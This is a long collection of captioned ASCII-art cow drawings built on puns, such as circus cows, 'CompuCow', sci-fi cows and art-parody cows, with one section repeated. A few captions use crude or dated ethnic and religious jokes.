-Cow Circus: The flying Cowlendas Cow Circus: Tightrope walking
-
- ______________________
- | |\
- | (__) | |
- | (oo) | |
- | \/ | |
- | / \ \ | |
- ///////// \_ \_/////// |
- | | / | | (__)
- | /++++++< | | _____(oo)
- |==/====|==\=\=========|=|===========================\\/
- | * | \_\_ | | / | ||
- _______O)-----^---------------\O)_________________*__||----||_____
-
- cow-lliope in the circus parade
-
- *
- \
- w \ w (__)
- \\ /\ // (oo)
- \\/ \// \/
- | | (__) >--( )--<
- |(__)| (oo) / \
- \(OO)/ .-\/-. >--- {} ---<
- //\/\\ <| |> v /\ v
- || || \ \/ / | (oo) |
- ||__|| |\/\/| \(^^)/
- /^^ ^^\ /----\ | |
- / ======== \ / \ | |
- / \ /* * * \ / \/ \
- |==============| /__*_*_*_\ | \ |
- \ / || || ^ / ^
- \ ======== / ^^ ^^ *
- \ _____ /
-Cow balancing on ball Cowslip Cownilingus
-
-
- (__) -'`- "Here's
- (oo) ____________________ ( oo ^ mooing
- /-------\/ | | /\_|-- at you,
- / | |\ / | o o o o o o | | \ \__ _ kid!"
- * ||----| / ====================== | \___['
- ^^ ^ || || | ||
- Cowncillor his cowch |____|-
- | |
- ~ ~
- (__) (__) (__) (__) humphrey cow-gurt
- (oo) (oo) (oo) (oo)
- /-------\/ \/ \/ \/-------\
- / | || =================== || | \
-* ||----|| || |--| |--| || ||----|| *
- ^^ ^^ -- ^ ^ ^ ^ -- ^^ ^^ (__)
- A game of cowntract bridge (oo)
- / \/ ____________
- / \===^__| |
- ---------------------- _|___ /\ |______________|
- (__) | \-/ \-/ || | |=====| | | |
- (oo) | _|_ _|_ |__| | *I I| | | |
- /-------\/ ---------------------- I I^ ^ | |
- / | || | \-/ | | | |
- * ||----|| | _|_ |_| |_| |_| | wolfgang amadeus moo-zart
- ^^ ^^ ----------------------
- Just a humble cownoisseur
-
-
- (__) (__) (__) (__)(__) (__) (__)(__)(__) (__)
- (oo(__)oo) (__)o) (oo)((__)(__)oo) (__)(o(__)o)(__)o)(__)
- \/(oo)\/ (oo)/(__)/ (oo)(oo)\/ (oo) \(oo)/ (oo)/ (oo)
- \/ \/ (oo) \/ \/ \/ \/ \/ \/
- \/
- a cownfluence
-
- _______
- (__( .-< | | |
- (oo) | |___|___|
- ___\/___| |\_____/|
- | | | | |
- | | | |_______|
- >-' | | _ | _ |
- *----/\ /-------// |--(_)--|
- / \ / | || |_______| (__)
- / \ * ||----|| | | (++)
- ^ ^ ^^ ^^ |_______| \/
- Egyptian Cow Marie Antoinette's Cow
-
- _
- ________|@|________
- | POLICE BOX | __
- |---------------| (^\/^) \(:)/
- |_______| / | \oo/ (o|o)
- || | || | | /-----\/ /-----\_/
- ||-----|| | | /| | /| |
- ||__|__|| | | V ||----|| ^ ||----||
- | ___ | | | ^^ ^^ ^^ ^^
- | |___| | | | Vulcan Cow Klingon Cow
- | _____ | (__)
- || || (oo) ---------
- || ||----//\/ ---< Master? >
- || ||B-9 \ | ---------
- ||_____||______\|
- |_______|_______|
- ----------------
- a Certain Time Lord's Cow (__) ---< EXTERMINATE!!! |
- ( ----0 ----------------
- (___) "Moo have twenty _\/_
- |===| seconds to comply." /oooo\---O
- ________\_/ / /oooooo\
- | | | /oooooooo\
- # ||______|| /oooooooooo\
- || || /____________\
- ^^ ^^
- RoboCow a Dalek Cow
-
- __________________ ___________________ ___________________
- /ine McBovine McBov\ /McCow McCow McCow M\ /ttle McCattle McCat\
- /cBovine McBovine McB\ /Cow McCow McCow McCow\ /e McCattle McCattle M\
------------------------- ------------------------- -------------------------
- \ovine McBovine McBov/ \McCow McCow McCow McC/ \attle McCattle McCatt/
- \McBovine McBovine / \w McCow McCow McCow/ \ McCattle McCattle /
- ~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~
- Ronald McDonald's Cows
-
- @ @
- @@@ @
- @@ @
- Pffii @@@@ @@
- ___________D @@@@@@
- |________ | _______
- (__) | / \ /
- ( oo /~| | __ \ /
- /\_|// | | / \ | |
- _/____/__| | | | | |
- | ___/-----------------_| (__)
- | / \ \ \ `(oo)
- | / \ | | |\/
- | | O | / / __ /
- |----| |-----------/ \-\\\ (__)
- \ / | o | \\\ _( )_
- ________\___/____________\__/____\\\_____________/_/__\_\____
-
- Cow Express Suicidal Cow
-
- o _____________
- /\ / \
- [__] ( take off, eh! )
- __ | \ / (oo) ----'\_____________/
- \/----///\ /-------\/
- */\______(xx) / | ||__|
- ( ) * ||----| U
- ^^ ^
-Pro-democracy cow from Beijing Canadian Cow
-
-
- o o o o o o
-o o o o o o o o o o
- o o o o ( ) o ( ) o ( ( o
- O ) ( ) ( ) (
-o o (__) o o (__) o (__) o o (__)
- (oo) (oo) (oo) o (oo) o
- /------$$$$ o o /-------\/ o /-------\/ /-------\/
- / | $$$$ / | || / | || / | ||
-* ||----|| o * ||----|| * ||----|| * ||----|| o
- ~~ ~~ ~~ ~~ ~~ ~~ ~~ ~~
- Santa Cow and his rein cows caught in a Montana snow flurry
-
- ___
- _/...\ *==\ ________________
- __________ (___) /::::::\ (/_\) / \
- /| `(0 0) |:::::::_ (o o) | Moo, Moo, Moo |
- / | \ / /-----+-+--- \ / /\________________/
- * |||----|||-/ * / | | | | 0 ___/
- ||| ||| * | _ |_| _ |
- || --+_+- ||
-Rudolph the Red-Nosed Cow -- --
- | |_ | |_
- /\ |____| |____|
- / O\ Santa Cows
- / , \
- / O \ _ - ~ ~ ~ ~ ~ ~ ~ ~ - _
- -/ , \- / |~ |~ \
- / O \ | |~ o| |~ o| |
- /, , \ / \ o| o| /
- / O O \ / \ /
- -/ , \- / / ~ ~ ~ ~ ~ ~ ~ ~ ~
- / O , \ / / .
- / , O ,\ (__) /* *\ / ./\.
- / O , O \ (oo) /\ /\ .//.\.
- / O \-\/ **** **** .///\\\.
- ------------------|| (oo) (oo) ////\\\\.
- ||/ ||----|| /-------\/ \/-------\ ||
- || ~~ ~~ /| || || |\ ~~
- Merry Cow-ristmas * ||----|| ||----|| *
- ~~ ~~ ~~ ~~
- Christmas Cowols
-
- O
- O O O
- O *
- Moory Cowristmas! ___ /|\
- _____________________| |_____ /||o\
- /______________________________\ /|o|||\
- ~ /________________________________\ /|||||o|\
- ~~ #### || | |||||||||||| | || /||o||||||\
- ~(oo) ||___|___||||||||||||___|___|| /||||o||||||\
- /-------\/ || | |||||||||||| | || /|o||||o|||o||\
- / | || ||___|___||||||||||||___|__ || | |
- * ||----|| ||||||||||||||||||||||||||||||oooooooooo| |ooooooo
-oooo~~oooo~~oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
-
-
- |----------------------| /\
- | | /\ /\/ \
- | | / \/ / \/\
- | | / \ \
- | | ----------------------------
- |______________________|
- \/
- |----------------------| o-@@
- |______________________|
- Minimalist Dead Cow
- ----------------------
- Mark Rothko Cow
- /=`=^^^#&@^@&)|||><<><><>
- \|}}{}{}{() (&) ~~~~#***
- (__) | (__) | (__) | (__) | (__) | (__) | #\**^^//?<>.+|@@@\/---___
- ( oo | ( oo | ( oo | ( oo | ( oo | ( oo | \|}}{}{/?<>.+|@@*&(*$@))(
- /\_| | /\_| | /\_| | /\_| | /\_| | /\_| | |@#)@(&*)($*I!?$>@$|$|$|$
-------------------------------------------------
- (__) | (__) | (__) | (__) | (__) | (__) | Jackson Pollock cow
- ( oo | ( oo | ( oo | ( oo | ( oo | ( oo |
- /\_| | /\_| | /\_| | /\_| | /\_| | /\_| | ____________________
------------------------------------------------- | (__) |
- (__) | (__) | (__) | (__) | (__) | (__) | | (oo) |
- ( oo | ( oo | ( oo | ( oo | ( oo | ( oo | | /-------\/ |
- /\_| | /\_| | /\_| | /\_| | /\_| | /\_| | | / | || |
------------------------------------------------- | * ||----|| |
- (__) | (__) | (__) | (__) | (__) | (__) | | ^^ ^^ |
- ( oo | ( oo | ( oo | ( oo | ( oo | ( oo | | Ceci N'est Pas |
- /\_| | /\_| | /\_| | /\_| | /\_| | /\_| | | Une Cow |
------------------------------------------------- --------------------
- Andy Warhol Cow Rene Margritte Cow
-
-
- oo --
- \/
-
-
- cow by night sleeping cow by night Chesire Cow
-
-
- II
- ( MOOOOOO ! ) II\
- ________\ / II + (__) ..oo( Hey, there's a cow driving that car! )
- |\ `v' \ + II (00)
- | \________|____\ \II\ \/-------\
- | ( ( @ @ ) ) II + || ||\ (__) ..oo ( How can he )
- |\|______\_O_/___| + II ||----|| * (oo) ( afford that? )
- | \_______________\ \II\ ~~ ~~ \/--------\
- \ (OO_##########_OO) II + || || \
- (\(_____[PHIL]_____) + II--+--+--+-II-+--+--+--II+--+--+--+II--+--+-
- (_) (_) \II II ~~ II ~~ II
- II--+--+--+-II-+--+--+--II+--+--+--+II--+--+-
-
- What cows think when people MOO at them
-
-
- /\\ ^ (__) (__)
- /__\\ | ( oo _ (oo)
- _ (o o) | /\__|( ) _ /-\/-\
- / \ /\_/\ / | \==//=(_) *POW!* / \
- | /|I I| | ==== | |
- ^/ |I I| | | | |
- | |I I| /| _ \ / \
- | |I I| / / / \ \ __________\
- | |_____| * || || \\
- ^ *^ ||_ ||_ (_)
-
-cow giving forgiveness Moo-hamid Ali Cow Bell.
-
-
- (!!) _/\_ \_\
- !!!!!!!!(oo) _______(oo) _________(oo)
- !/| \/ /| \/ /| Ferrari \/
- !/ |______|| / |______|| / |________||
- * || || * || || * || ||
- ^^ ^^ ^^ ^^ ^^ ^^
-Last of the Moo-hicans Mayflower cows Sports Cow
-
-
- (__) (__)
- (oo) (oo)
- /--------------- \/ / ------------- \/
- / ( !S M T W T F! ) / ( |7 8 9 +| )
- / ( +-+-+-+-+-+-+ ) * ( |4 5 6 -| )
- * ( +-+-+-+-+-+-+ ) ( |1 2 3 X| )
- ( +-+-+-+-+-+-+ ) ( |C 0 = /| )
- (+-+-+-+-+-+-+) ^---------^
- || || || ||
- || || || ||
- ^^ ^^ ^^ ^^
- "COWLENDAR" "COWCULATOR"
-
- /\
- / \ __ ________ ------
- DOCTOR _/__\_ |__| | |====|
- MOO/ /=(OO) (oo) * | v|
- \/ --/==-\/==\ /-------\/ |^^ *|
- / | \==|| \==\ /// / | || ------
- * ||-|==|| \==\/==/ * ||----||
- ~~ ///~~ \===/ ^^ ^^
- Gallifreyan Cow Straight out of Cowllege
-
-
- (__)
- (oo)
- /-------\/ # #
- / | || \\ //
-* ||----||\ \\ //
- ^^ ^^ \ \ --- /
- \ | |
- | | |
- | | |
- | / \_/ \ (__)
- | // \\ <--(xx)--#-
- | // \\ /\
- ___________\|/___________
- Cow-a-flower Cow at butcher's party
-
-
- ___--------___ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- / . . . \ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- |\/ . (__) . \/| ^^^^^^^^^^^^^^^^^^^oo^^^^^^^^^^^^
- || . . (oo) . . || ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- |/\ . \/ . /\| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- \___ . . ___/ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- --------- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- Cow in a haggis Cow on top of Ben Nevis
-
-
- ___________________________
- | (__) (__) (__) (__) | * (__)
- | ( oo ( oo ( oo ( oo | \ (oo)
-_______| /\_| /\_| /\_| /\_| |________ \-------\/
-| | | ||
-| _____ _____ | ||----||
-|___| |________________________| |____| (oo) (oo)
- |___| |___|
- Cow-pooling rollerscating cow
-
- __ o oo o
- (__) \||/
- (__) (__) (___)
- (__) (oo) (oo) (o o)
- ( ) /-------\/ /-------\/ /$$$$$$$\ /
- ( /* ) / | || / | || / $$$$$$$|O
- | | * ||----|| * ||----|| * ||w---||
- ^ ^ ^^ ^^ ^^ ^^ ^^ ^^
- Dairy-Air East Indian Cow Injun Cow Cash Cow
-
- ( )
- (___) PRISON# # # # # ||| |||
- (o o) # # # # #(_#) # (O O)
- /------------\ / # # # # #(o#) # /------------\___/
- / | #-# # #/-#--#--#-\# # / | |||
-* | ||| # # |# # #||# # / || |||
- ||--------||| # *# |#--#--#||# # * ||----------|||
- ^^ ^^ # # ^# # #^^# # ^^ ^^
- Orville Redencow The Bakker Cows
-
-
- (__) (__)
- / oo ______ / @@ ______
- | /\_| | \ | /\_| | \
- | |___ | | | |___ | |
- | ---@ |_______| | ---@ |_______|
- * | | ---- | | | | ---- | |
- \ | |_____ | |_____
- \|________| *____/|________|
-
- CompuCow CompuCow After an All-niter
-
-
-
- (__) (__)
- / -- ______ / .\/. ______
- | /\_| | \ | /\_| | \
- | |___ | | | |___ | |
- | ---@ |_______| | ---@ |_______|
- | | ---- | | * | | ---- | |
- | |_____ \ | |_____
- *____/|________| \|________|
-
- CompuCow Asleep at the Keyboard CompuCow Discovers Bug in Compiler
-
-
- \\ \\
- \\ \\
- / \ / \
- / \ / \
- \ \ \ \
- \ \(__) \ \(__)
- *--> (oo) *--> (oo)
- / / \/ o / / \/
- / / / /
- \ / o \ /
- \ / \ /
- // //
- // o //
-
- B-2 Stealth Bomber cow Stealth cow on bombing run
-
-
- ___
- / \ ( ) Happy
-| \ |--| Mooosic! (__)
-| | \ /__ (oo)
-+----------+ __oo| \ / -\/ (__)
-|Steinway &|_ \/| | / || >----(oo)---->
-|___ Sons ___|_/ |__| * ------|| /-------\/
-| | | / / | ^^ / | ||
-o o o | | ||---- * ||----||
- ^^ ^^ ^^
- Chopin'ing Cow TeX cow Steve Martin's cow
-
-
- (__) +=============================+
- (oo) | F R E D ' S S A L O O N |
- ______ ______\/ (__)| +-----+ |
- __|______\__/____/\\[} (xx)| | ___ | |(__)
- / --- \\ --- \/ | |/=|=\| |(oo)
-|[] / \ \ / / \ | |==|==| | \/
- | @ | \____/ | @ | | |==|==| |
- \ / \ / ------------------------------------
- --- ---
- COW-ASAKI Cows behind bars
-
- __ _________ __ _________
- ( V _ _ )_ ( V )_
- / ( \o/ ) ) / //// )
- ( \_O_/ \ ( (---) \
- \ /O\ ) \ |moo| )
- ( @ @ / ( (---) /
- (_____/\____) (_____/\____)
- o o
- o o
- o o
- (__) (__)
- /----(uu) /----(uu)
- *__/| \o==s *__/| \o==s
-/\(* \| __ \\----==s \)) /\(* \| __ \\----==s \))
- |/))* | \ )*\||/))// |/))* | \ )*\||/))//
- ~ ~\/--\*) ~ ~\/--\*)
- Dreaming Cow Cow Dreaming of Silage
-
-
- (__) o o * (__)
- (oo) o o \ (OO)
- /-------\/==o o \-------\/
- / | || ____ [] | ||
- * ||----|| |__| (/\)s==|----||
- ~~ ~~ /__\ ~ ~~
- Cow blowing bubbles. Cow kicking over lantern that started
- the Great Chicago Fire of 1885.
-
- __// \__ |\__|\
- /^^^)^^/ ) ( \^^(^^^\ | 00 |
- /( _( ^/ \^ )_ )\ \---<( -- )>---/
- | /\_| | \ | /\_| | \
- | |___ | | | |___ | |
- | ---@ |_______| | ---@ |_______|
- * | | ---- | | | | ---- | |
- \ | |_____ | |_____
- \|________| *____/|________|
-
- CompuCow CompuCow After an All-niter
-
-
-
- (__) (__)
- / -- ______ / .\/. ______
- | /\_| | \ | /\_| | \
- | |___ | | | |___ | |
- | ---@ |_______| | ---@ |_______|
- | | ---- | | * | | ---- | |
- | |_____ \ | |_____
- *____/|________| \|________|
-
- CompuCow Asleep at the Keyboard CompuCow Discovers Bug in Compiler
-
-
- \\ \\
- \\ \\
- / \ / \
- / \ / \
- \ \ \ \
- \ \(__) \ \(__)
- *--> (oo) *--> (oo)
- / / \/ o / / \/
- / / / /
- \ / o \ /
- \ / \ /
- // //
- // o //
-
- B-2 Stealth Bomber cow Stealth cow on bombing run
-
-
- ___
- / \ ( ) Happy
-| \ |--| Mooosic! (__)
-| | \ /__ (oo)
-+----------+ __oo| \ / -\/ (__)
-|Steinway &|_ \/| | / || >----(oo)---->
-|___ Sons ___|_/ |__| * ------|| /-------\/
-| | | / / | ^^ / | ||
-o o o | | ||---- * ||----||
- ^^ ^^ ^^
- Chopin'ing Cow TeX cow Steve Martin's cow
-
-
- (__) +=============================+
- (oo) | F R E D ' S S A L O O N |
- ______ ______\/ (__)| +-----+ |
- __|______\__/____/\\[} (xx)| | ___ | |(__)
- / --- \\ --- \/ | |/=|=\| |(oo)
-|[] / \ \ / / \ | |==|==| | \/
- | @ | \____/ | @ | | |==|==| |
- \ / \ / ------------------------------------
- --- ---
- COW-ASAKI Cows behind bars
-
- __ _________ __ _________
- ( V _ _ )_ ( V )_
- / ( \o/ ) ) / //// )
- ( \_O_/ \ ( (---) \
- \ /O\ ) \ |moo| )
- ( @ @ / ( (---) /
- (_____/\____) (_____/\____)
- o o
- o o
- o o
- (__) (__)
- /----(uu) /----(uu)
- *__/| \o==s *__/| \o==s
-/\(* \| __ \\----==s \)) /\(* \| __ \\----==s \))
- |/))* | \ )*\||/))// |/))* | \ )*\||/))//
- ~ ~\/--\*) ~ ~\/--\*)
- Dreaming Cow Cow Dreaming of Silage
-
-
- (__) o o * (__)
- (oo) o o \ (OO)
- /-------\/==o o \-------\/
- / | || ____ [] | ||
- * ||----|| |__| (/\)s==|----||
- ~~ ~~ /__\ ~ ~~
- Cow blowing bubbles. Cow kicking over lantern that started
- the Great Chicago Fire of 1885.
-
- __// \__ |\__|\
- /^^^)^^/ ) ( \^^(^^^\ | 00 |
- /( _( ^/ \^ )_ )\ \---<( -- )>---/
- / \ // | / \ | \ / \ \ |--| /
- / \ O/ \O // \ \__/ \--/
- ( )/\ //\( ) ( )
- /\ // \ /\ | |
- / / /W COW-TOW W\ \ \ --------
- * \( )/ * || ||
- \_ _// nn nn
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Cow after learning that
- the vice president has a
-(__) (__) (__) (__) lower IQ than he does
-(oo) + (oo) = (oo) (oo)
- \/ \/ \/ \/ (__,
- (+o)
-(__) (__)(__) (__) (__) (__) /-----#-----\'
-(oo) + (oo)(oo) = (oo) (oo) (oo) / | Cownucks|| \
- \/ \/ \/ \/ \/ \/ }}--------}} \ o
- == == --
- Cownting... This cow plays hockey
-
-
- /.
- moo /`'\ .
- (__) MOO! ` / ./ \..
- (oo) / ../ .' \.
- /-------\/ ../ / ../ \
- / | || ./ ./ ./ \
- * ||----|| ./ ./ \ \.
--------^^----^^----- .../ ../ ../ \
- \ / / /
- Ech-cow (echo)
-
- ________________ (__)
- ^__^ / \ (--)s ---mmmmoooooooOOOOOO!
- (oo) ( Milk is logical. ) __ \O//
- /-------\/ --'\________________/ / ==s)\_____
- / | || *--/|_/-----/ OO COW
-* ||W---|| |__ __ II JOYRIDES
- ^^ ^^ O O o o / \-----/ \
-Mr Spock's cow \__/ \__/
-
- * . . ,
- . . * . .
- . *
- \ / , (__) , ,
- - * - ( . |
- . / \ , . \/ . - - .
- . / \\ , |
- , * * / /\\
- . /\\ / . .
- * . / \\ . .
- _|_ , . , / , *
- | . , . * , . .
- . , . . . * .
-
- The Milky Way
-
-
- \ / ________________________________
- \/ / \
- (__) /\ | At times likes these you |
- (oo) O O | REALLY CoVet a proper surgeon! |
- _\/_ // O \________________________________/
- * ( ) // O
- \ (\\ // o
- \( \\ ) o (__)
- ( \\ ) /\ (oo)
- ___[\______/^^^^^^^\__/) o-)__ /\/\
- |\__[=======______//________)__\ Cocown (\==/)
- \|_______________//____________| \<>/
- ||| || //|| |||
- ||| || @.|| ||| (___) /^^^^^\
- || \/ .\/ || /- -\ / MU /
- . . ( ^ ) __/______/
- '.'.` \_O_/
- COW-OPERATION Buddha's Cow
-
-
- (_ ~ - _) / ~
- ( - - | =s
-O | *
- | O \ \ - |
- | \ |
- - - |
-
-)
- Cow after one too many Pan-Galactic Gargle Blasters.
-
-
- (__) ---_
-(__) _______________* (oo) /| \
-(xx)-\ \ /-------\/ / |\ \_ (__)
- \/ /-\___________\--\ / | | * ||\ (oo)
- * ------ ~~ \____ \/
- Boneless Cow No leg cow (ground beef) Two leg cow (lean beef)
-
-
- (__)
- (oo)
- \/ \___/
- / / \\ (0 0)
- / /\\ \ /
- /\\ / v
- / / \\ |
- / <-------|------->
- / * |
- |\ |
- / | \ / __|__
- \\ \ \/ \/
- / \\ \ \/ \/
- / \\___\ \/ \/
- / \\ __|__
- / \\ \ /
- / / / \\ |\ /|
- / \\ | V |
- / / \\ | |
- / \\ | |
- / \\ W W
- \\
- ===============================O=========== Stick Cow sunbathing
- =========================================== at Malibu wearing a
- O) O) special cow bikini.
- The dreaded cowtapult
-
-
- (__) (___) ** ((__))
- (__) (__) (___) \\ ((oo))
- (oo) ( ) ( ) \\------\\//
- | \/ | ( /*) | | || ||
- | | || || | | |||----|||
- (___) ^^^ ^^^
-Cows doin' it Cows doin' it \_* Cow during an
- FRONT VIEW BACK VIEW TOP VIEW Earthquake
-
-
- (( _ _ (___) (__)
- ( D\ (_)(_)____ (0 0) (oo)
- _______\__| | MOOTV____( /-------\_O---moo *-\/-------\
- /| || _/\____/ / | || / || | \
- / ||____| \/^ / \ * ||,---|| * ||-----|| *
-* || | O O ^^ ^^ \/|(/)(/\(,,/
- ^^ ^ Romie mooed... while Julie ate.
- "Moo-vie Camera" (The Bard's barnyard inspirations)
-
-
- ______________________________________________________
- | |
- _______ | |
- / _____ | | ACME MOO-VERS |
- / /(__) || | |
- ________/ / |OO| || | |
- | |-------|| | |
-(| | -.|| |_______________________ |
- | ____ \ ||_________||____________ | ____ ____ |
-/| / __ \ |______|| / __ \ / __ \ | | / __ \ / __ \ |\
-\|| / \ |_______________| / \ |_| / \ |__| |___________| / \ |__| / \ |_|/
- | () | | () | | () | | () | | () |
- \__/ \__/ \__/ \__/ \__/
-
- "The Moo-vers are here!"
-
-
- -- (__) * (__)* (__)* (__)* (__)
- *--- - (QQ) \ (oo) \ (oo) \ (oo) \ (o-)
- - \------\/ \-------\/ ^^\-------\/ ^^\-------\/ ^^\-------\/
---- | | | // | // | // | ||
- - ||()--|| ||------+ ||------+ ||------+ ||----||
- oo oo ^^ ^^ ^^ ^^ ^^
-
- Roller Cow Cows in polonaise
-
-
- -------------/
- /
- /
- /
- /
- /
- / (__)
-^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
-Ship arriving too late to save a drowing cow (apologies to Frank Zappa)
-
- \ / ____
- |\/| {___} \__/ \/ * \/
- (oo) ( * ) (--) | O O |
- /-------\/ V /--------\Q/ /--------\/ \ /
- / | ||__| / | || / | || \**/
-* ||----| * ||-----|| * ||----|| --
- ^^ ^ -- -- -- -- Milkael
-Cow from Vulcan Smoking 1-eyed cow Cow w/ rabbit ears Cowbachev
-
-
- (*) (*)
- (__) ^ ^ (__)
- (oo) | | | @(oo)@
- [..] | = | [..]@@
-\ | U (-) | | | | (-) U @@@@
- || ==<_\=====/_|______=_____|=|____________=__|____\====/_>== ||
- || ) |||||||||||||||||||||||||||||||||||||||||||||||||||| ( ||
- ||___)==||||||||||||||||||||||||||||||||||||||||||||||||||||==(___||
- |\====| |||||||||||||||||||||||||||||||||||||||||||||||||||| |====/|
- | \ | | | | / |
- = * = = = = * =
- cows having candlelight dinner
-
- (___)
- (o o)
- ( ** ) __\_/__
- |e e| //^^*^^\ \___/
- \ / ____*===*______* / * \ (O O)
- OO * Givenchy *\ / | * | \ \ /
- | * * * \ \ |=====| / O
- /**************** * "|_____|"
- // ************* | | | Cow exclaiming
- || || \_/|| | | | "Holy Cow"
- || || || || |_|_|
- v| v| v| v| ^ ^
- Haute Cowture COWNT
-
- |\
- |[] |\
- (__) | |[] |\
- (--) | (__) | |[] |\
- * _________\/ /| (o-) | (__) | |[]
- | (__) /,, ,, /_|_______\/ /| (oo) | (__) |
- | __(oo) *--------------/,, ,, /_|_______\/ /| (OO) |
- \===== |\/ | *--------------/,, ,, /_|_______\/ /|
- _|_/ \_ |===========| *--------------/,, ,, / |
- -//\-----/\\ o |===========| *----------------|
- \_/ \_/ o |===========| |
------------------ o |================|
- Cowazaki COW-WARD o o
-
-
- ______________________________
- / \
- ( Freisian a jolly good fellow! )
- \________________ ____________/
- ) ) ()
- (__) // ( )
- (__) (oo) / (___) ( __ )
- /(oo)---\/ (o o) (oo)
- /-------\/ || \ /-------\ /-------/||||
- / | ||----|| O|| | \ / | || |||
-* ||----|| ^^ ||---,|| * * ||----|| |
- ^^ ^^ ^^ ^^ ^^ ^^
- Two cows COW-ngratulating a bull Ayatollah Cow-manhi
-
- (__) |====|
- /--------------------/ (oo) \oo/
- / | || / (__) /-------\/ /-------\/
-* ||----|| /-----------(oo) / | ||----> / | ||
- ^^ ^^ \/ * ||----|| * ||----||
- ___/ ___/ ^^ ^^
- Network Virtual Cow Cowcatcher
-(with separate frontend and backend) Cow waterskiing (Major league)
-
-
- /\ __
- {__} _[__]_
- (oo) /(oo)\
- /-------\/ /------@\/@
- / | + || / | |@@
- * ||----|| * ||----||
- ^^ ^^ ^^ ^^
- Sacred Cow Zen Cow (eating grass) Hasidic Cow
-
- _____ _________________
- / \ / \
-( 1+2=3 ) ( 1+SIN(2x)+COS(3x) )
- \__ _/ \_____ __________/ (__)
- ( ( ) ) >(==)
- \\ // )__( /-\/-\
- \ (__) / (oo) /( )\
- (oo) \/-------* ^ ( ) ^
- /-------\/ || | \ ( )
- / | || ||----|| \ /----\
- * ||----|| vv vv / \ \
- ^^ ^^ ^ * ^
- COWculator (2) Reverse Polish Cow Cow-a-bunga
-
- ^^ ^^
- O (___) || * ||----||
- | (o o) || \ | ||
- (no-bull-ity) ---> % -\ /- || \-------/\
- |\/| O | || (oo)
- | | | || ( )
- / v-' || ><
- /==========| ( )
- // || (oo)
- ,------._(__) || || /-------\/
- * | \ ( oo || || / | ||
-vv====>----=\/====vv |===========| * ||----||
- ^^ ^^
- COWTOW Bi-cow molecule
-
- (__) (__)
- () () _____| oo | |oo|
- ()() / | /----|-|__|-|
- (oo) / | / | ||
- /-------UU /____________| * ||----||
- / | || ^^ ^^ ^^ ^^
-* ||w---|| Cow dressed up Cow dressed up
- ^^ ^^ as ghost as Frankenstein
-Eh, What's up Doc? for Halloween For Halloween
-
-
- (__) |\/| (__)
- (oo) (oo) >(==)
- __[_]__\/ /-------VV /-------\/
- / | || / | || / | ||
-* ||----|| --> . * ||----|| * ||----||
- ^^ ^^ ^^ ^^ ~~ ~~
- Portable Cow Japanese model Lycownthropy Cow-a-bunga (2)
- (very handy) portable COW
-
-
- _______________________
- |^^^^| ( Dammit, Jim, I'm a )
- | | ( doctor, not a butcher!)
- @| Oo (---------------------))
- (MM) | ._> (__) )
- (oo) \ / (oo)
- /-------\/ /--------- /-------\/
- / | || / | || / I * II
- * ||----|| * ||-----|| * II----II
- ^^ ^^ ^^ ^^
- Cowabunga! Bart Simpcow Dr. Bones McCow
-
-
-
- ________________ (__)
- // (__)(__)||(__)\\ (oo)
- // (oo)(oo)||(oo) \\ /-------\/
- // \\"\/""\/"||"\/"/ \\ / //____\\
- / ============||=======\\ * // \\
- (| |- ||- ||)
- |________|_____||________||/ ***********
- \-( O )----------( O )--/ **** ***
- --- --- *** *
- ****o
- Cowpool ******
- ***
- *** *
- (__) *** ***
- (oo) ******
- /-------\/___()~
- / | || Cow jumping over the moon
- * ||----||
- ^^ ^^
- Cow smoking a pipe
-
-
- o o o o o o o
- o o o o o o o o
- (__) o o o o o o
- (oo) o o o o o o
- /-------\/___() o o o o
- / | ||
- * ||----||
- ^^ ^^
- Cow blowing bubbles from a pipe
-
-
-
- * * * o @ ~ *
- * * * , o * * *
- (__) * * * . * o
- (oo) * * ) . *
- /-------\/ * -(*)- ~ @ *
- / | || (
- * ||----||
- ^^ ^^
- Cow star-gazing
-
-
- |
- \|/
- ----*----
- /|\
- |
-
- (__)
- (oo)
- /-------\/
- / | ||
- * ||----||
- ^^ ^^
-
- Cow wishing upon a star
-
-
-
-
-
- ________ _______
- (__) / \ (__) / \
- (oo) ( Squeak!! ) (oo) ( !oMo! )
- /-------\/ --'\________/ /-------\/ --'\_______/
- / | || / | ||
- * ||----|| * ||----||
- ~~ ~~ ~~ ~~
- A Cow-mon Dyslexic
- Mistake Cow @@@@@
- @@\0 0/@@
- (o o)
- ___________________________ ** |U| **
- / / / / ***( )***
- / /__________/ / // \ / \\
- / / // *** \\
- / / *******
- / / ***********
- / / ***************
- / 3.5" 135tpi / *******************
- /__________________________/ *********************
- *********************
- Cow Stored as Binary
- Information. Cow Belle
-
-
-
- (___) (___) (___)(___)
- (o o) * (o o) (o o)(o o)
- /------\ / (__) \_(--) /------\ / \ /-----\
- / ____O (oo) / (**)\ / (__)_O O___ \
- ( )/----\----\/ ( / \/\ ) ( )(oo)--\---/--/( )
- /\oo===| / ~ || \\ / /\oo==@/|| ~ \~ |===oo/\
- | || ||~-----|| |||~~|| | || ||-----~|| || |
- * || || || ||| || * || || || || *
- ~~ ~~ ~~ ~~~ ~~ ~~ ~~ ~~ ~~
-
- Cows at a garden party
-
-
-
- * (__) .
- \ (oo) .'
- ...\------\/ '.
- (__) (__) . (__) || (__)
- (oo) (oo) . (oo)----|| (oo)
- /-------\/ /------\ / /-------\/ ^^/-------\/
- / | || / | |\/ / | || \| ||
- * ||----|| * ||----|| * ||----|| *><----><
- ^^ ^^ ^^ ^^ ^^ ^^ ^^ ^^
- Cow Cow feeling Cow feeling Cow feeling
- pissed off pissed on pissed
-
-
- (__) * (__) * (__) ( )
- (oo) \ (oo) \ (OO) ( )
- /-------\/ ..\-------\/ \-------\/ ( ( )
- / | || . | || / \\ ( ) )
- * ||W---|| . ||----|| //------\\ ( )
